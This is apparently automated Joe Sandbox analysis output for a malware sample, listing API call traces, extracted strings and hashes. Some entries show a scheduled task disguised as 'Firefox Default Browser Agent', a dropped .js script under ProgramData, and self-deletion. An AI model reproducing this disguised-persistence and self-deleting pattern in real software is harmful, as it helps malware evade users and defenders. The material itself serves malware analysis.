                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00F011AD,?,32DDA911,?,00F0B469,?,00F093E8,00000000,00F011AD), ref: 00F0B41B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: cf6ba42e29287d5ff740676b2dd2b9f8141a1c7ac55b4e275f471f80d4a9efdb
                      • Instruction ID: a244c6945e6bd8bb28f961480761e5666394518d526b7a2d903c22f6ea0a1153
                      • Opcode Fuzzy Hash: cf6ba42e29287d5ff740676b2dd2b9f8141a1c7ac55b4e275f471f80d4a9efdb
                      • Instruction Fuzzy Hash: 10212736E01214ABCB219F24DC81BAE7798DF517B4F224220E911B72D1D730EE01FAE1
                      APIs
                      Strings
                      • tfxgtsblbgudmdxba, xrefs: 00F02AE6
                      • cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza, xrefs: 00F02AF7
                      • avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc, xrefs: 00F02AD2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc$cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza$tfxgtsblbgudmdxba
                      • API String ID: 1384045349-1665046790
                      • Opcode ID: 63a7d59d8e779ec3873f420c9f21ca80988decdfbf6bf86b6e77188b29bf6bc6
                      • Instruction ID: 46ecb3977abc84efc1a2230ec05a898af33e91d344cd04d3d5bb568600eeb159
                      • Opcode Fuzzy Hash: 63a7d59d8e779ec3873f420c9f21ca80988decdfbf6bf86b6e77188b29bf6bc6
                      • Instruction Fuzzy Hash: 2821547090025CCADB00DFA4CD59BEDBBB4FB04714F504229E416BB2C1DBB8AA49EB51
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 005E81A6
                      • lstrcmpA.KERNEL32(00000000,INIT), ref: 005E81B3
                      • StrToIntA.SHLWAPI(00000000), ref: 005E8276
                      • GetTickCount64.KERNEL32 ref: 005E867B
                        • Part of subcall function 005E5760: GetProcessHeap.KERNEL32(00000008,00000001,005E823E,00000001,00000000), ref: 005E5763
                        • Part of subcall function 005E5760: HeapAlloc.KERNEL32(00000000), ref: 005E576A
                      • StrToIntA.SHLWAPI(00000000), ref: 005E8574
                      • StrToIntA.SHLWAPI(?), ref: 005E857D
                      • CreateThread.KERNEL32(00000000,00000000,Function_00007570,00000000,00000000,00000000), ref: 005E8591
                      • CloseHandle.KERNEL32(00000000), ref: 005E859C
                        • Part of subcall function 005E5780: GetProcessHeap.KERNEL32(00000000,00000000,005E86C5), ref: 005E5787
                        • Part of subcall function 005E5780: HeapFree.KERNEL32(00000000), ref: 005E578E
                      • Sleep.KERNEL32(00000000), ref: 005E86D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
                      • String ID:
                      • API String ID: 1253608127-0
                      • Opcode ID: 162cf6da778296b5c204e5cabcc2268b9ff05092a9193b37e13777f50f799773
                      • Instruction ID: bd69290817964e244bcf65bcd59f07df62bf66058646a63fe3c74d1909be9b54
                      • Opcode Fuzzy Hash: 162cf6da778296b5c204e5cabcc2268b9ff05092a9193b37e13777f50f799773
                      • Instruction Fuzzy Hash: F321F932E007969BDB2CABB2CC99A7F7E75BF94340F10045AE495A7290EF34ED048791
                      APIs
                      • GetLastError.KERNEL32(?,?,00F05CEB,00F058E2,00F05066), ref: 00F05D02
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F05D10
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F05D29
                      • SetLastError.KERNEL32(00000000,00F05CEB,00F058E2,00F05066), ref: 00F05D7B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 4b050555a8b9618684367dbc77771314edd5b81eb6274e7b7a93b3583b9e825f
                      • Instruction ID: a99ef7d38ae5804fb0ea5c0ac67898eab4a69633ba005961e89074fc8e3aee45
                      • Opcode Fuzzy Hash: 4b050555a8b9618684367dbc77771314edd5b81eb6274e7b7a93b3583b9e825f
                      • Instruction Fuzzy Hash: 2701D83250EB1DAEFB242674BC8D79B3A54EB09B75721422BF520850F1FF958C117544
                      APIs
                      Strings
                      • ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy, xrefs: 00F02D32
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy
                      • API String ID: 1384045349-2373637132
                      • Opcode ID: 4ee52d91b54dcbbcf89bafea622fba5c93fd30359f01f1519fe6387b68196fd0
                      • Instruction ID: b1ebebf5ddf25b1c9590cd206cac63e59269c318950ebf45afd864d2b267291f
                      • Opcode Fuzzy Hash: 4ee52d91b54dcbbcf89bafea622fba5c93fd30359f01f1519fe6387b68196fd0
                      • Instruction Fuzzy Hash: EA219A70C04A8CDEDB01DFA8C9147DEBBB4EF1A310F408259E411BB2C1DBB95A45EB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID:
                      • String ID: -$8$=
                      • API String ID: 0-1406877022
                      • Opcode ID: a6c200d4786a914e6a22e49178137fb71d619078b25d0ee82a7aeb891890aea6
                      • Instruction ID: 159b8cd76f7d07500f32f83cd9a9d46f111d94b20a1cb5f6cb87e2ffa5aff6cf
                      • Opcode Fuzzy Hash: a6c200d4786a914e6a22e49178137fb71d619078b25d0ee82a7aeb891890aea6
                      • Instruction Fuzzy Hash: FC112871C5061DCADB45CFA8D9083BEBBB4FB04344F10C25AD8127A280DB748A85FB61
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,32DDA911,?,?,00000000,00F12094,000000FF,?,00F083C5,?,?,00F08399,00000016), ref: 00F0841E
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F08430
                      • FreeLibrary.KERNEL32(00000000,?,00000000,00F12094,000000FF,?,00F083C5,?,?,00F08399,00000016), ref: 00F08452
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 333a6257043818234507f654d4576406856367106790895ca23d18017126b8ca
                      • Instruction ID: 7f57c7c0e674ea4172ad931b70021942ccf165be3ad1cafa65c908e8dd493266
                      • Opcode Fuzzy Hash: 333a6257043818234507f654d4576406856367106790895ca23d18017126b8ca
                      • Instruction Fuzzy Hash: 3101A23590065DEBCB11CB50DC09BEEBBB8FB08B54F018629E811A22E0DB749A00EA91
                      APIs
                      • wnsprintfW.SHLWAPI ref: 005E751F
                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005E753B
                        • Part of subcall function 005E6C60: VariantInit.OLEAUT32(?), ref: 005E6C77
                        • Part of subcall function 005E6C60: CoCreateInstance.OLE32(005E1020,00000000,00000001,005E1000,?), ref: 005E6C94
                        • Part of subcall function 005E6C60: SysAllocString.OLEAUT32(\Mozilla), ref: 005E6CD4
                        • Part of subcall function 005E6C60: SysFreeString.OLEAUT32(?), ref: 005E6D0B
                        • Part of subcall function 005E6C60: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E6D18
                        • Part of subcall function 005E6C60: SysFreeString.OLEAUT32(00000000), ref: 005E6D2F
                        • Part of subcall function 005E96F0: GetFileAttributesW.KERNEL32(?,005E7551), ref: 005E96F1
                      • DeleteFileW.KERNEL32(?), ref: 005E755C
                      • ExitProcess.KERNEL32 ref: 005E7564
                      Strings
                      • %%ProgramData%%\r%Sr.js, xrefs: 005E7514
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
                      • String ID: %%ProgramData%%\r%Sr.js
                      • API String ID: 3376550436-2368859843
                      • Opcode ID: 18435630c87898facfedcb8547c8736db17949b3a192d3602f8c8817757ecd8a
                      • Instruction ID: c368e04cf90747b9ea9a94bdf09cea6526f80ee30f59a66cc9aa6bd979faf6e5
                      • Opcode Fuzzy Hash: 18435630c87898facfedcb8547c8736db17949b3a192d3602f8c8817757ecd8a
                      • Instruction Fuzzy Hash: 60F0A7B180035CA7DB18EBA1CC8DEDB7B3CBB04705F4005A1B3D5A60A1DBB056C8CE14
                      APIs
                      • __alloca_probe_16.LIBCMT ref: 00F0CB35
                      • __alloca_probe_16.LIBCMT ref: 00F0CBFE
                      • __freea.LIBCMT ref: 00F0CC65
                        • Part of subcall function 00F093A5: HeapAlloc.KERNEL32(00000000,00F011AD,?,?,00F011AD,?), ref: 00F093D7
                      • __freea.LIBCMT ref: 00F0CC78
                      • __freea.LIBCMT ref: 00F0CC85
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: __freea$__alloca_probe_16$AllocHeap
                      • String ID:
                      • API String ID: 1096550386-0
                      • Opcode ID: 5866b77cf71473dbba1c1b4a647115f8e92fd4fd54e791b1f57f2e86873c2d13
                      • Instruction ID: 2fe958c8656dfb34c4dc7ed149eb8e16207a56ccf1a73b4163585c970e325dc3
                      • Opcode Fuzzy Hash: 5866b77cf71473dbba1c1b4a647115f8e92fd4fd54e791b1f57f2e86873c2d13
                      • Instruction Fuzzy Hash: D251D572A0024AAFEB219F65CC45EBB76A9EF84720F154229FD09D61D0EB35CC54F7A0
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F06DC3,00000000,?,00F1BD48,?,?,?,00F06F66,00000004,InitializeCriticalSectionEx,00F13C98,InitializeCriticalSectionEx), ref: 00F06E1F
                      • GetLastError.KERNEL32(?,00F06DC3,00000000,?,00F1BD48,?,?,?,00F06F66,00000004,InitializeCriticalSectionEx,00F13C98,InitializeCriticalSectionEx,00000000,?,00F06D1D), ref: 00F06E29
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F06E51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID: api-ms-
                      • API String ID: 3177248105-2084034818
                      • Opcode ID: 1151ee0b37d64bdbb2b76a7564e950b7eb2dac15a88f6a2d77ee5c6c0905d2dd
                      • Instruction ID: aa0a5de5bd991d2e9f79856692eb2647bfb39fc7a33ef92c77939861deb7f37b
                      • Opcode Fuzzy Hash: 1151ee0b37d64bdbb2b76a7564e950b7eb2dac15a88f6a2d77ee5c6c0905d2dd
                      • Instruction Fuzzy Hash: 86E04F74680308F7EF201B61EC06B993F999B10F54F118020FA0DF80E2DB71DA61B98A
                      APIs
                      • GetConsoleOutputCP.KERNEL32(32DDA911,00000000,00000000,00000008), ref: 00F0CFE0
                        • Part of subcall function 00F0A5D9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F0CC5B,?,00000000,-00000008), ref: 00F0A63A
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F0D232
                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F0D278
                      • GetLastError.KERNEL32 ref: 00F0D31B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                      • String ID:
                      • API String ID: 2112829910-0
                      • Opcode ID: bc2ecd5650c21a20f3df98d4bad7a8e3eb3b525151d45800135794812da5dfb6
                      • Instruction ID: ce68b960d5f369510ff7d3dba195897ccc06fe7ffe4e27444653ad0398e6cbb7
                      • Opcode Fuzzy Hash: bc2ecd5650c21a20f3df98d4bad7a8e3eb3b525151d45800135794812da5dfb6
                      • Instruction Fuzzy Hash: 03D16B75D042489FDF15CFE8D880AEDBBB5FF09314F24416AE856EB391D630A942EB50
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 17f11c73530142359872d3a1b3dda0276b4323f8f5a938c225673f14ab2aa124
                      • Instruction ID: 4cafd27f2d26a445ca3da300640de231021423b9a18c13a9ff661eef98694932
                      • Opcode Fuzzy Hash: 17f11c73530142359872d3a1b3dda0276b4323f8f5a938c225673f14ab2aa124
                      • Instruction Fuzzy Hash: F251C272A04A02EFDB259F14D841B6BB7A5EF00B21F24412DE9458B1D1D7B5ED40FF90
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000), ref: 00F0E76D
                      • GetLastError.KERNEL32(?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000,00000008,00000008,?,00F0D912,00000000), ref: 00F0E779
                        • Part of subcall function 00F0E73F: CloseHandle.KERNEL32(FFFFFFFE,00F0E789,?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000,00000008,00000008), ref: 00F0E74F
                      • ___initconout.LIBCMT ref: 00F0E789
                        • Part of subcall function 00F0E701: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F0E730,00F0DEFD,00000008,?,00F0D36F,00000008,00000000,00000000,00000008), ref: 00F0E714
                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00F0DF10,00000000,00000001,?,00000008,?,00F0D36F,00000008,00000000,00000000,00000008), ref: 00F0E79E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: 3dcfc16af6f3e4bb3c2b63ae143dfa4b069e324d08642bd2248a4ba9d6f95d46
                      • Instruction ID: 9cb94c2a1227b5dc52a99054dabe25ff27d67fbf1908de0f6681885328ab2d07
                      • Opcode Fuzzy Hash: 3dcfc16af6f3e4bb3c2b63ae143dfa4b069e324d08642bd2248a4ba9d6f95d46
                      • Instruction Fuzzy Hash: 0DF0AC3651215CBFCF226FE5DC08AD97F66FB487B1B558410FA2995160C632C921FB90
                      APIs
                      • EncodePointer.KERNEL32(00000000,?), ref: 00F063F5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: b005fab1b0ef0d04cfc56835c30dc65c9e46822e30ba124ce8c2079308504cdc
                      • Instruction ID: 78f0a77d32f53640720293bb916a7046ff3d048813ebe6d1daac65a589f691d3
                      • Opcode Fuzzy Hash: b005fab1b0ef0d04cfc56835c30dc65c9e46822e30ba124ce8c2079308504cdc
                      • Instruction Fuzzy Hash: 86418675D00209AFDF15CF98CD81AAEBBB6BF08314F198099F904A72A1D37599A0FB50
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32), ref: 00F0111B
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00F01162
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID: kernel32
                      • API String ID: 4139908857-541877477
                      • Opcode ID: 62655b34cc702b3265c2161809f01352ddaf9f46e1d8faf63c845aa9fb70d031
                      • Instruction ID: e7ba486d4342269b4319e9ad757992d02d22e670a700c0ec4e4ab4b3addeb366
                      • Opcode Fuzzy Hash: 62655b34cc702b3265c2161809f01352ddaf9f46e1d8faf63c845aa9fb70d031
                      • Instruction Fuzzy Hash: 7621C7B5D0020CEBCB04DFE4DD45AEEBBB4BF48305F108558E905A7280E7359A41EF61